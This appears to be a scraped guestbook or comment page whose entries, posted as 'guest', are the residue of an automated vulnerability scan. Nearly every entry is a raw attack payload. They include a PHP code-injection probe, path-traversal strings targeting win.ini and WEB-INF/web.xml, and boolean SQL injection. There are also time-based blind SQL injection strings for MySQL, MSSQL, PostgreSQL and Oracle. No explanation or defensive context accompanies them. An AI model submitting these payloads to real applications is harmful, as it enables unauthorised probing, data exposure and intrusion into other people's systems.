'.print(md5(31337)).'

1727140252

re: guest

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727140252

re: guest

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727140253

re: guest

WEB-INF/web.xml

1727140254

re: guest

WEB-INF\web.xml

1727140255

re: guest

1

1727140781

re: guest

1

1727140796

re: guest

-1 OR 2+978-978-1=0+0+0+1 --

1727140797

re: guest

-1 OR 3+978-978-1=0+0+0+1 --

1727140797

re: guest

-1 OR 2+482-482-1=0+0+0+1

1727140798

re: guest

-1 OR 3+482-482-1=0+0+0+1

1727140798

re: guest

-1' OR 2+90-90-1=0+0+0+1 --

1727140799

re: guest

-1' OR 3+90-90-1=0+0+0+1 --

1727140799

re: guest

-1' OR 2+55-55-1=0+0+0+1 or 'RX1VANZG'='

1727140800

re: guest

-1' OR 3+55-55-1=0+0+0+1 or 'RX1VANZG'='

1727140800

re: guest

-1" OR 2+793-793-1=0+0+0+1 --

1727140801

re: guest

-1" OR 3+793-793-1=0+0+0+1 --

1727140801

re: guest

if(now()=sysdate(),sleep(15),0)

1727140813

re: guest

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727140826

re: guest

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727140836

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727140846

re: guest

-1; waitfor delay '0:0:15' --

1727140855

re: guest

-1); waitfor delay '0:0:15' --

1727140866

re: guest

1 waitfor delay '0:0:15' --

1727140875

re: guest

Haz4Je7k'; waitfor delay '0:0:15' --

1727140884

re: guest

-5 OR 723=(SELECT 723 FROM PG_SLEEP(15))--

1727140893

re: guest

-5) OR 851=(SELECT 851 FROM PG_SLEEP(15))--

1727140902

re: guest

-1)) OR 231=(SELECT 231 FROM PG_SLEEP(15))--

1727140911

re: guest

dt2M98Qi' OR 903=(SELECT 903 FROM PG_SLEEP(15))--

1727140921

re: guest

8RSC49z7') OR 795=(SELECT 795 FROM PG_SLEEP(15))--

1727140930

re: guest

7coLKXYE')) OR 568=(SELECT 568 FROM PG_SLEEP(15))--

1727140939

re: guest

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727140948

re: guest

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727140958

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1727140970

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1727140980

re: guest

1'"

1727140981

re: guest

@@EbVVx

1727140981

re: guest

1

1727383079

re: guest

1

1727383080

re: guest

1

1727383080

re: guest

1

1727383606

re: guest

1

1727383607

re: guest

1

1727383607